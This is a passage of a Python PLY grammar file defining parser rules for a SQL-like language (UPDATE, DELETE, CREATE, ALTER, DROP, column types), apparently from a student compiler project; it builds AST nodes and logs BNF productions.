FROM TIMESTAMP\n '''\n token = t.slice[1]\n cadena = str(token.type)\n graph_ref = graph_node(str(\"ops_from_ts\"), [t[1], t[2], t[3]], [])\n addCad(\"**\\** ::= \" + cadena + \" tFrom tTimestamp \")\n t[0] = DateAST_2(token.type, token.lineno, token.lexpos, graph_ref)\n\n\ndef p_column_list_param_opt(t):\n '''column_list_param_opt : PARA column_list PARC \n | empty'''\n if len(t) == 4:\n lista = None\n childsProduction = []\n if t[2] != None:\n lista = t[2][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"column_list_param_opt\"), [t[1], lista, t[3]], childsProduction)\n addCad(\"**\\** ::= '(' \\ ')' \")\n t[0] = upNodo(t[2], 0, 0, graph_ref)\n else:\n t[0] = None\n\n\ndef p_column_list(t):\n '''column_list : column_list COMA ID\n | ID'''\n if len(t) == 4:\n lista = None\n childsProduction = []\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"column_list\"), [lista, t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tIdentifier \")\n token_id = t.slice[3]\n t[1][0].graph_ref = graph_ref\n t[1].append(Identifier(token_id.value, token_id.lineno, token_id.lexpos, graph_ref))\n t[0] = t[1]\n else:\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tIdentifier \")\n token_id = t.slice[1]\n t[0] = [Identifier(token_id.value, token_id.lineno, token_id.lexpos, graph_ref)]\n\n\ndef p_stm_update(t):\n '''stm_update : UPDATE ID SET update_list where_clause\n | UPDATE ID SET update_list'''\n token_up = t.slice[1]\n if len(t) == 6:\n lista = None\n childsProduction = addNotNoneChild(t, [5])\n if t[4] != None:\n lista = t[4][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"stm_update\"), [t[1], t[2], t[3], lista, t[5]], childsProduction)\n addCad(\"**\\** ::= tUpdate tIdentifier tSet \\ \\ \")\n t[0] = Update(t[2], t[4], t[5], token_up.lineno, token_up.lexpos, graph_ref)\n else:\n lista = None\n childsProduction = []\n if t[4] != None:\n lista = t[4][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"stm_update\"), [t[1], t[2], t[3], lista], childsProduction)\n addCad(\"**\\** ::= tUpdate tIdentifier tSet \\ \")\n t[0] = Update(t[2], t[4], None, token_up.lineno, token_up.lexpos, graph_ref)\n\n\ndef p_update_list(t):\n '''update_list : update_list COMA ID IGUAL logicExpression\n | ID IGUAL logicExpression'''\n if len(t) == 6:\n token_up = t.slice[3]\n lista = None\n childsProduction = addNotNoneChild(t, [5])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"update_list\"), [lista, t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tIdentifier '=' \\ \")\n t[1][0].graph_ref = graph_ref\n t[1].append(UpdateItem(t[3], t[5], token_up.lineno, token_up.lexpos, graph_ref))\n t[0] = t[1]\n else:\n token_up = t.slice[1]\n childsProduction = addNotNoneChild(t, [3])\n graph_ref = graph_node(str(\"update_list\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= tIdentifier '=' \\ \")\n t[0] = [UpdateItem(t[1], t[3], token_up.lineno, token_up.lexpos, graph_ref)]\n\n\n################################\n\ndef p_stm_use_db(t):\n '''stm_use_db : USE DATABASE ID\n | USE ID'''\n if len(t) == 4:\n tokenID = t.slice[3]\n graph_ref = graph_node(str(\"stm_use_db\"), [t[1], t[2], t[3]], [])\n addCad(\"**\\** ::= tUse tDatabase tIdentifier \")\n\n IDAST = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = UseDatabase(IDAST, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n else:\n tokenID = t.slice[len(t) - 1]\n graph_ref = graph_node(str(\"stm_use_db\"), [t[1], t[2]], [])\n addCad(\"**\\** ::= tUse tIdentifier \")\n IDAST = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = UseDatabase(IDAST, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\n########## >>>>>>>>>>>>>>>> STM_DELETE AND STM_ALTER <<<<<<<<<<<<<<<<<<<<<<\ndef p_stm_delete(t):\n '''stm_delete : DELETE FROM ID where_clause\n | DELETE FROM ID'''\n token_del = t.slice[1]\n if len(t) == 5:\n childsProduction = addNotNoneChild(t, [4])\n graph_ref = graph_node(str(\"stm_delete\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tDelete tFrom tIdentifier \\\")\n t[0] = Delete(t[3], t[4], token_del.lineno, token_del.lexpos, graph_ref)\n else:\n childsProduction = None\n graph_ref = graph_node(str(\"stm_delete\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= tDelete tFrom tIdentifier \")\n t[0] = Delete(t[3], None, token_del.lineno, token_del.lexpos, graph_ref)\n\n\ndef p_where_clause(t):\n '''where_clause : WHERE predicateExpression'''\n childsProduction = addNotNoneChild(t, [2])\n graph_ref = graph_node(str(\"where_clause\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= tWhere \\\")\n t[0] = Where(t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_stm_create(t):\n '''stm_create : CREATE or_replace_opt DATABASE if_not_exists_opt ID owner_opt mode_opt\n | CREATE TABLE ID PARA tab_create_list PARC inherits_opt\n | CREATE TYPE ID AS ENUM PARA exp_list PARC'''\n token = t.slice[1]\n tok = t.slice[3]\n if len(t) == 8 and tok.type == \"DATABASE\":\n tokenID = t.slice[5]\n childsProduction = addNotNoneChild(t, [2, 4, 6, 7])\n graph_ref = graph_node(str(\"stm_create\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7]], childsProduction)\n addCad(\"**\\** ::= tCreate \\ tDatabase tIdentifier \\ \\\")\n tvla = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = CreateDatabase(tvla, None, t[7], (True if t[2] else False), (True if t[4] else False), token.lineno,\n token.lexpos, graph_ref)\n\n elif len(t) == 8:\n lista = None\n childsProduction = addNotNoneChild(t, [7])\n if t[5] != None:\n lista = t[5][0]\n childsProduction.append(lista.graph_ref)\n\n graph_ref = graph_node(str(\"stm_create\"), [t[1], t[2], t[3], t[4], lista, t[6], t[7]], childsProduction)\n addCad(\n \"

    \\n\\n**\\** ::= tCreate tTable tIdentifier '(' \\ ')' \\\")\n t[0] = CreateTable(t[3], t[7], t[5], None, token.lineno, token.lexpos,\n graph_ref) # TODO check if param check_exp is neceary and where we obtain that\n\n elif len(t) == 9:\n lista = None\n childsProduction = []\n if t[7] != None:\n lista = t[7][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"stm_create\"), [t[1], t[2], t[3], t[4], t[5], t[6], lista, t[8]], childsProduction)\n addCad(\"**\\** ::= tCreate tType tIdentifier tAs tEnum '(' \\ ')' \")\n t[0] = CreateEnum(t[3], t[7], token.lineno, token.lexpos, graph_ref)\n\n\ndef p_if__not_exist_opt(t):\n '''if_not_exists_opt : IF NOT EXISTS\n | empty'''\n if len(t) == 4:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2]) + \" \" + str(t[3])))\n addCad(\"**\\** ::= tIf tNot tExists \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n # for table columns and contrainst\n\n\ndef p_tab_create_list(t):\n '''tab_create_list : tab_create_list COMA ID type nullable_opt primary_key_opt \n | ID type nullable_opt primary_key_opt'''\n if len(t) == 7:\n lista = None\n childsProduction = addNotNoneChild(t, [4, 5, 6])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"tab_create_list\"), [lista, t[2], t[3], t[4], t[5], t[6]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tIdentifier \\ \\ \\ \")\n TF = TableField(t.slice[3].value, t[4].val, t[4].max_size, t[5], (t[6] is not None), t.slice[3].lineno,\n t.slice[3].lexpos, graph_ref)\n t[1][0].graph_ref = graph_ref\n t[1].append(TF)\n t[0] = t[1]\n else:\n childsProduction = addNotNoneChild(t, [2, 3, 4])\n graph_ref = graph_node(str(\"tab_create__list\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tIdentifier \\ \\ \\ \")\n t[0] = [TableField(t.slice[1].value, t[2].val, t[2].max_size, t[3], (t[4] is not None), t.slice[1].lineno,\n t.slice[1].lexpos, graph_ref)]\n\n\ndef p_primary_key_opt(t):\n '''primary_key_opt : PRIMARY KEY\n | empty'''\n if len(t) == 3:\n graph_ref = graph_node(str(t[1] + \" \" + t[2]))\n addCad(\"**\\** ::= tPrimary tKey \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_nullable(t):\n '''nullable : NULL\n | NOT NULL'''\n if len(t) == 2:\n graph_ref = graph_node(str(t[1]), [], [])\n addCad(\"**\\** ::= tNull \")\n t[0] = Nullable(True, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n else:\n graph_ref = graph_node(str(t[1] + \" \" + t[2]))\n addCad(\"**\\** ::= tNot tNull \")\n t[0] = Nullable(False, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_nullable_opt(t):\n '''nullable_opt : nullable\n | empty'''\n token = t.slice[1]\n if token.type == \"nullable\":\n addCad(\"**\\** ::= \")\n t[0] = t[1]\n ##### \n else:\n t[0] = None\n\n\ndef p_inherits_opt(t):\n '''inherits_opt : INHERITS PARA ID PARC\n | empty'''\n if len(t) == 5:\n graph_ref = graph_node(str(t[1] + \" \" + str(t[2]) + \" \" + str(t[3]) + \" \" + str(t[4])))\n addCad(\"**\\** ::= tInherits '(' tIdentifier ')' \")\n token = t.slice[3]\n t[0] = Identifier(token.value, token.lineno, token.lexpos, graph_ref)\n else:\n t[0] = None\n\n\n# owner option\ndef p_owner_opt(t):\n '''owner_opt : OWNER IGUAL ID\n | OWNER IGUAL TEXTO'''\n graph_ref = graph_node(str(t[1] + \" \" + t[2] + \" \" + t[3]))\n addCad(\"**\\** ::= tOwner '=' [tTexto | tIdentifier ] \")\n tokenID = t.slice[3]\n t[0] = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, graph_ref)\n\n\ndef p_owner_opt0(t):\n '''owner_opt : OWNER ID\n | OWNER TEXTO'''\n tokenID = t.slice[2]\n graph_ref = graph_node(str(t[1] + \" \" + t[2]))\n addCad(\"**\\** ::= tOwner [tTexto | tIdentifier ] \")\n t[0] = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, graph_ref)\n\n\ndef p_owner_opt1(t):\n '''owner_opt : empty'''\n t[0] = None\n\n\n# mode option\ndef p_mode_opt(t):\n '''mode_opt : MODE IGUAL ENTERO'''\n tokenID = t.slice[3]\n graph_ref = graph_node(str(t[1] + \" \" + t[2] + \" \" + str(t[3])))\n addCad(\"**\\** ::= tMode '=' tEntero \")\n t[0] = Numeric(tokenID.value, tokenID.lineno, tokenID.lexpos, graph_ref)\n\n\ndef p_mode_opt1(t):\n '''mode_opt : MODE ENTERO'''\n tokenID = t.slice[2]\n graph_ref = graph_node(str(t[1] + \" \" + str(t[2])))\n addCad(\"**\\** ::= tMode tEntero \")\n t[0] = Numeric(tokenID.value, tokenID.lineno, tokenID.lexpos, graph_ref)\n\n\ndef p_mode_opt2(t):\n '''mode_opt : empty'''\n t[0] = None\n\n\n# Replace OPTION\ndef p_or_replace_opt(t):\n '''or_replace_opt : OR REPLACE\n | empty'''\n if len(t) == 3:\n graph_ref = graph_node(str(t[1] + \" \" + t[2]))\n addCad(\"**\\** ::= tOr tReplace \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_stm_alter(t):\n '''stm_alter : ALTER DATABASE ID RENAME TO ID \n | ALTER DATABASE ID OWNER TO db_owner\n'''\n token_alter = t.slice[4]\n if token_alter.type == \"RENAME\":\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6]], [])\n addCad(\"**\\** ::= tAlter tDatabase tIdentifier tRename tTo tIdentifier \")\n t[0] = AlterDatabaseRename(t[3], t[6], token_alter.lineno, token_alter.lexpos, graph_ref)\n if token_alter.type == \"OWNER\":\n childsProduction = addNotNoneChild(t, [6])\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6]], childsProduction)\n addCad(\"**\\** ::= tAlter tDatabase tIdentifier tOwner tTo \\ \")\n t[0] = AlterDatabaseOwner(t[3], t[6], token_alter.lineno, token_alter.lexpos, graph_ref)\n\n\ndef p_stm_alter0(t):\n '''stm_alter : ALTER TABLE ID DROP CONSTRAINT ID\n | ALTER TABLE ID DROP COLUMN ID\n'''\n token_alter = t.slice[5]\n if token_alter.type == \"CONSTRAINT\":\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6]], [])\n addCad(\"**\\** ::= tAlter tTable tIdentifier tDrop tIdentifier \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n if token_alter.type == \"COLUMN\":\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6]], [])\n addCad(\"**\\** ::= tAlter tTable tIdentifier tDrop tColumn tIdentifier \")\n t[0] = AlterTableDropColumn(t[3], t[6], token_alter.lineno, token_alter.lexpos, graph_ref)\n\n\ndef p_stm_alter1(t):\n '''stm_alter : ALTER TABLE ID ADD COLUMN ID type nullable_opt\n | ALTER TABLE ID ADD CHECK PARA logicExpression PARC\n | ALTER TABLE ID ALTER COLUMN ID TYPE type param_int_opt\n'''\n token_alter = t.slice[6]\n if token_alter.type == \"ID\" and t[7] != 'TYPE':\n childsProduction = addNotNoneChild(t, [7])\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8]], childsProduction)\n addCad(\"**\\** ::= tAlter tTable tIdentifier tAdd tColumn tIdentifier \\ \\ \")\n t[0] = AlterTableAddColumn(t[3], t[6], t[7], t[7].max_size, t[8], token_alter.lineno, token_alter.lexpos,\n graph_ref)\n elif token_alter.type == \"PARA\":\n childsProduction = addNotNoneChild(t, [7])\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8]], childsProduction)\n addCad(\"**\\** ::= tAlter tTable tIdentifier tAdd tCheck '(' \\ ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif token_alter.type == \"ID\":\n childsProduction = addNotNoneChild(t, [8])\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8]], childsProduction)\n addCad(\"**\\** ::= tAlter tTable tIdentifier tAlter tColumn tType \\ \\ \")\n t[0] = AlterTableChangeColumnType(t[3], t[6], t[8], t[8].max_size, token_alter.lineno, token_alter.lexpos,\n graph_ref)\n\n\ndef p_stm_alter2(t):\n '''stm_alter : ALTER TABLE ID RENAME COLUMN ID TO ID\n | ALTER TABLE ID ALTER COLUMN ID SET NULL\n | ALTER TABLE ID ALTER COLUMN ID SET NOT NULL \n | ALTER TABLE ID ADD CONSTRAINT ID UNIQUE PARA ID PARC\n | ALTER TABLE ID ADD FOREIGN KEY PARA ID PARC REFERENCES ID \n'''\n token_alter = t.slice[1]\n if len(t) == 9 and t[4].upper() == 'RENAME':\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8]], [])\n addCad(\"**\\** ::= tAlter tTable tIdentifier tRename tColumn tIdentifier tTo tIdentifier \")\n t[0] = AlterTableRenameColumn(t[3], t[6], t[8], token_alter.lineno, token_alter.lexpos, graph_ref)\n elif len(t) == 9 and t[4].upper() == 'ALTER':\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8]], [])\n addCad(\"**\\** ::= tAlter tTable tIdentifier tAlter tColumn tIdentifier tSet tNull \")\n t[0] = AlterTableNotNull(t[3], t[6], True, token_alter.lineno, token_alter.lexpos, graph_ref)\n elif len(t) == 10:\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8], t[9]], [])\n addCad(\"**\\** ::= tAlter tTable tIdentifier tAlter tColumn tIdentifier tSet tNot tNull \")\n t[0] = AlterTableNotNull(t[3], t[6], False, token_alter.lineno, token_alter.lexpos, graph_ref)\n elif len(t) == 11:\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8], t[9], t[10]], [])\n addCad(\n \"**\\** ::= tAlter tTable tIdentifier tAdd tConstraint tIdentifier tUnique '(' tIdentifier ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif len(t) == 12:\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8], t[9], t[10], t[11]],\n [])\n addCad(\n \"**\\** ::= tAlter tTable tIdentifier tAdd tForeign tKey '(' tIdentifier ')' tReference tIdentifier \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n\n\ndef p_param_int_opt(t):\n '''param_int_opt : PARA ENTERO PARC\n | empty'''\n if len(t) == 4:\n graph_ref = graph_node(str(t[1] + \" \" + t[2] + \" \" + t[3]))\n addCad(\"**\\** ::= '(' tEntero ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_db_owner(t):\n ''' db_owner : ID\n | CURRENT_USER\n | SESSION_USER'''\n token_owner = t.slice[1]\n if token_owner.type == \"ID\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tIdentifier \")\n t[0] = Identifier(t[1], token_owner.lineno, token_owner.lexpos, graph_ref)\n elif token_owner.type == \"CURRENT_USER\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tCurrentUser \")\n t[0] = Identifier(token_owner.value, token_owner.lineno, token_owner.lexpos, graph_ref)\n elif token_owner.type == \"SESSION_USER\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tSessionUser \")\n t[0] = Identifier(token_owner.value, token_owner.lineno, token_owner.lexpos, graph_ref)\n\n\ndef p_stm_drop(t):\n '''stm_drop : DROP DATABASE if_exists_opt ID\n | DROP TABLE ID'''\n token = t.slice[1]\n if len(t) == 5:\n tokenID = t.slice[4]\n childsProduction = addNotNoneChild(t, [3])\n graph_ref = graph_node(str(\"stm_drop\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tDrop tDatabase \\ tIdentifier\")\n name_db = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = DropDatabase(name_db, (True if t[3] else False), token.lineno, token.lexpos, graph_ref)\n ##### \n else:\n tokenID = t.slice[3]\n graph_ref = graph_node(str(\"stm_drop\"), [t[1], t[2], t[3]], [])\n addCad(\"**\\** ::= tDrop tTable tIdentifier \")\n name_db = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = DropTable(name_db, token.lineno, token.lexpos, graph_ref)\n ##### \n\n\ndef p_if_exist_opt(t):\n '''if_exists_opt : IF EXISTS\n | empty'''\n if len(t) == 3:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= tIf tExists \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n #############################\n\n\ndef p_type(t):\n ''' type : SMALLINT\n | INTEGER \n | BIGINT\n | DECIMAL PARA ENTERO COMA ENTERO PARC\n | NUMERIC PARA ENTERO COMA ENTERO PARC\n | REAL PARA ENTERO COMA ENTERO PARC\n | DOUBLE PRECISION PARA ENTERO COMA ENTERO PARC\n | MONEY\n | CARACTER VARYING\n | VARCHAR PARA ENTERO PARC\n | CHARACTER\n | CHAR PARA ENTERO PARC\n | TEXT\n | TIMESTAMP\n | DATE\n | TIME\n | INTERVAL\n | BOOLEAN\n | ID\n | VARCHAR\n | NUMERIC \n | REAL\n | DECIMAL'''\n token = t.slice[1]\n\n if token.type == \"DOUBLE\":\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= DOUBLE PRECISION \")\n t[0] = TypeDef(token.type, None, None, token.lineno, token.lexpos)\n\n elif (token.type == \"CARACTER\" or token.type == \"CHAR\") and len(t) == 3:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= CARACTER VARYING\")\n t[0] = TypeDef(token.type, 0, t[3], token.lineno, token.lexpos, graph_ref)\n\n elif token.type == \"ID\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= \" + str(token.value).upper())\n t[0] = TypeDef(str(token.value).upper(), None, None, token.lineno, token.lexpos, graph_ref)\n\n elif len(t) > 4:\n if token.type == \"DECIMAL\":\n graph_ref = graph_node(str(str(t[1]) + \"(\" + str(t[3])+ \",\" + str(t[5])+ \")\" ))\n addCad(\"**\\** ::= tDecimal '(' tEntero ',' tEntero ')'\")\n t[0] = TypeDef(token.type, t[3], t[5], token.lineno, token.lexpos, graph_ref)\n elif token.type == \"NUMERIC\":\n graph_ref = graph_node(str(str(t[1]) + \"(\" + str(t[3])+ \",\" + str(t[5])+ \")\" ))\n t[0] = TypeDef(token.type, t[3], t[5], token.lineno, token.lexpos, graph_ref)\n elif token.type == \"REAL\":\n graph_ref = graph_node(str(str(t[1]) + \"(\" + str(t[3])+ \",\" + str(t[5])+ \")\" ))\n addCad(\"**\\** ::= tReal '(' tEntero ',' tEntero ')'\")\n t[0] = TypeDef(token.type, t[3], t[5], token.lineno, token.lexpos, graph_ref)\n elif token.type == \"DOUBLE\":\n graph_ref = graph_node(str(str(t[1]) + \"(\" + str(t[3])+ \",\" + str(t[5])+ \")\" ))\n addCad(\"**\\** ::= tDouble '(' tEntero ',' tEntero ')'\")\n t[0] = TypeDef(token.type, t[3], t[5], token.lineno, token.lexpos, graph_ref)\n elif token.type == \"VARCHAR\" or token.type == \"CHAR\":\n graph_ref = graph_node(str(str(t[1]) + \"(\" + str(t[3])+ \")\" ))\n addCad(\"**\\** ::= tDouble '(' tEntero ',' tEntero ')'\")\n t[0] = TypeDef(token.type, 0, t[3], token.lineno, token.lexpos, graph_ref)\n\n else:\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= \" + str(token.type))\n t[0] = TypeDef(token.type, None, None, token.lineno, token.lexpos, graph_ref)\n\n\n######################\n\ndef p_time(t):\n ''' time : YEAR\n | MONTH\n | DAY\n | HOUR\n | MINUTE\n | SECOND'''\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\